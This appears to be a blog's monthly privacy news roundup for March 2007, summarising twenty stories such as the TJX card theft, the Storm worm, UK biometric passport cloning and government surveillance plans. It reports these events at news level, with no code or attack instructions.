Privacy Roundup #0008 • March 2007
March 2007 was dominated by the record-breaking TJX card heist, fresh doubts over UK identity and passport plans, and a steady drip of malware, phishing and tracking that put personal data under siege.
1. Botnets punt Russian dog-barking translation spam
Kaspersky reported that Trojans made up ninety per cent of new malicious code in 2006, much of it built to herd infected machines into spam-spewing botnets. The junk ranged from English-language pharmaceutical pitches to a Russian gadget that claimed to translate a dog's bark.
2. Vista keygen hoax exposed
A tool that claimed to brute-force Windows Vista activation keys turned out to be a hoax, with its own author admitting it never worked. The episode highlighted how piracy fears and activation checks were shaping the way Microsoft handled user machines.
3. Microsoft's OneCare flunks anti-virus test
Microsoft's Live OneCare came last in an independent test of seventeen security packages, missing almost eighteen per cent of nearly half a million malware samples. The poor showing raised doubts about how well home users relying on it were actually protected.
4. How to clone a biometric passport while it's still in the bag
Security consultant Adam Laurie showed that a new UK biometric passport could be cloned without removing it from its delivery envelope. The encryption key was derived from the passport number, date of birth and expiry date, much of which an attacker could reconstruct within hours.
5. Stormy weather for malware defenses
The Storm worm evaded signature-based antivirus by spawning thousands of variants at once, overwhelming traditional defences. Security firms were pushed towards behaviour-blocking techniques as the older detection model began to fail.
6. LexisNexis hacker jailed and fined
A young Massachusetts man was sentenced to a year in prison for his part in a conspiracy to break into a LexisNexis law-enforcement database. The intrusion exposed personal records on more than 310,000 people, some of which were used to look up details on celebrities.
7. Microsoft admits WGA update phones home
Microsoft conceded that its Windows Genuine Advantage anti-piracy update still transmitted data to Redmond even when users clicked cancel. The company insisted the information held no personal details, but the silent reporting renewed long-standing privacy complaints.
8. Internet scams dominate UK card fraud losses
APACS figures showed total UK card fraud fell three per cent in 2006, yet card-not-present and online banking losses surged as criminals moved to remote attacks. Online banking fraud nearly doubled to £33.5m as phishing incidents soared.
9. Google to anonymize user data
Google announced that it would strip identifying details from its search logs after eighteen to twenty-four months. The move followed pressure from privacy advocates and the fallout from AOL's release of supposedly anonymous search queries.
10. Blogger.com 'riddled' with malware
Researchers found hundreds of Google Blogger pages laced with the Wonka Trojan and phishing kits aimed at harvesting personal details. The Stration mass mailer was being used to drive victims towards the compromised blogs.
11. Yahoo! can! help! jail! Chinese! dissidents!
Yahoo! Hong Kong escaped prosecution over handing user information to authorities that helped jail a journalist on the mainland. Hong Kong's privacy commissioner concluded that the case fell outside his jurisdiction, leaving the disclosure unpunished.
12. Old adware habits hard to break for AT&T and Travelocity
AT&T and Travelocity were caught running adverts on adware-infected computers despite earlier promising New York's attorney general to stop. Researcher Ben Edelman documented their ads appearing through notorious ad-injection networks.
13. IE7 phishing bug nets concern
Researchers reported a cross-site scripting flaw in Internet Explorer 7 that could be twisted into more convincing phishing lures. The bug let attackers swap a navigation error page for a misleading refresh link, though exploitation was fiddly.
14. UK gov says broken passport system justifies ID cards
The Home Office used figures on roughly ten thousand fraudulent passports to argue the case for its national identity card scheme. Critics called it surreal for the government to advertise its own failings as a reason to build a vast new database.
15. US wants all 10 fingerprints on entry
The Department of Homeland Security set out plans to take all ten fingerprints from foreign air travellers rather than just two. Trials were to begin at ten airports, with a nationwide rollout of the expanded biometric screening expected within a year.
16. Commons to eye surveillance society
A Commons select committee announced an inquiry into the spread of state surveillance across Britain. Its remit took in identity cards, government databases, biometrics and CCTV, amid growing unease about data sharing and civil liberties.
17. Brussels downbeat on US passenger snoop plan
Talks over handing European passenger name records to the United States stalled, with American negotiators suggesting a deal might not be needed. At stake were data retention periods and the reach of the US Automated Targeting System over European travellers.
18. Hospital laptop theft sparks concerns
A laptop stolen from a Nottinghamshire hospital held personal details on around eleven thousand children. The loss triggered an investigation and renewed calls from security experts for full disk encryption on portable machines.
19. TJX lost up to 45.6m card numbers
TJX disclosed that intruders had lifted up to 45.6 million credit and debit card numbers over seventeen months, the largest known card theft to that date. Personal information, often including social security numbers, for at least 451,000 people was also taken.
20. ICANN urged to cut phishing trawl with banking domain
Security experts pressed ICANN to create a restricted top-level domain for verified banks, so customers could tell genuine sites from fakes. The plea followed a jump in UK phishing incidents from 1,713 in 2005 to 14,156 in 2006.
Enjoyed this post?
Well, you could share the post with others, follow me with RSS Feeds and/or send me a comment via email.
Tags
Category:
Year: